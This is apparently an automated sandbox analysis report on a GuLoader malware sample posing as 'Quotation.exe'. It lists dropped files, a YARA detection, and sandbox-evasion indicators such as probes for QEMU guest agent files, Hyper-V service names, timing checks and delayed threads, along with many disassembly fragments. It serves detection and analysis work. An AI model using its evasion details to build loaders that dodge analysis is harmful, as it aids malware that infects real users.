        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
        Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_6D262F60 push eax; ret
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F808C0 push ebp; retf
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F86274 push ebp; retf
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F84A2E push edx; retf
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F80604 push esi; ret
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F85F8F push edi; retf
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F8694F push edi; ret
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F86525 push edi; iretd
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335308CD push ecx; mov dword ptr [esp], ecx
        Source: maintenanceservice2.exe.1.drStatic PE information: section name: .00cfg
        Source: percentile.dll.1.drStatic PE information: section name: .xdata
        Source: percentile.dll.1.drStatic PE information: section name: /4
        Source: percentile.dll.1.drStatic PE information: section name: /19
        Source: percentile.dll.1.drStatic PE information: section name: /31
        Source: percentile.dll.1.drStatic PE information: section name: /45
        Source: percentile.dll.1.drStatic PE information: section name: /57
        Source: percentile.dll.1.drStatic PE information: section name: /70
        Source: percentile.dll.1.drStatic PE information: section name: /81
        Source: percentile.dll.1.drStatic PE information: section name: /92
        Source: libdatrie-1.dll.1.drStatic PE information: section name: .xdata
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: section name: .xdata
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exeJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\explorer.exe TID: 6924Thread sleep time: -45000s >= -30000s
        Source: C:\Windows\SysWOW64\control.exe TID: 6272Thread sleep count: 103 > 30
        Source: C:\Windows\SysWOW64\control.exe TID: 6272Thread sleep time: -206000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dllJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exeJump to dropped file
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 rdtsc
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877
        Source: C:\Users\user\Desktop\Quotation.exeAPI coverage: 1.3 %
        Source: C:\Windows\SysWOW64\control.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402765 FindFirstFileA,
        Source: C:\Users\user\Desktop\Quotation.exeSystem information queried: ModuleInformation
        Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: explorer.exe, 0000000C.00000003.23162953109.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CCCA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:\z1
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003226000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23174182850.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010332000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010332000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 rdtsc
        Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A350 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355237A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356631F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33529303 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33529303 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF30A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33603336 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355332D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335633D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335643D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B43D5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C3C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335363CB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF38A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AC3B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF247 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355F24A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335ED270 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352821B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A200 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33550230 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335532C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336032C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335272E0 mov eax, dword ptr fs:[00000030h]
